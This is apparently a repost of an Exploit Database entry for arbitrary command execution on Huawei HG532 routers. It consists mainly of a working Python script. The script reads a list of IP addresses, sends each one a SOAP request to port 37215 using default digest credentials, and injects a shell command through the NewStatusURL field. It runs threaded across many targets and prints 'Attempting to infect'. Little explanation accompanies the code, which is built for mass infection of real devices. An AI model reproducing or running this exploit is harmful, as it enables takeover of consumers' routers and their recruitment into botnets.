Huawei Router HG532 – Arbitrary Command Execution

• Exploit Database
• 17 阅读

• 作者： anonymous
  日期： 2017-12-25
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/43414/

• import threading, sys, time, random, socket, re, os, struct, array, requests
  from requests.auth import HTTPDigestAuth
  ips = open(sys.argv[1], "r").readlines()
  cmd = "" # Your MIPS (SSHD)
  rm = "<?xml version=\"1.0\" ?>\n<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n<NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n</s:Body>\n</s:Envelope>"
  
  class exploit(threading.Thread):
  		def __init__ (self, ip):
  			threading.Thread.__init__(self)
  			self.ip = str(ip).rstrip('\n')
  		def run(self):
  			try:
  				url = "http://" + self.ip + ":37215/ctrlt/DeviceUpgrade_1"
  				requests.post(url, timeout=5, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)
  				print "[SOAP] Attempting to infect " + self.ip
  			except Exception as e:
  				pass
  
  for ip in ips:
  	try:
  		n = exploit(ip)
  		n.start()
  		time.sleep(0.03)
  	except:
  		pass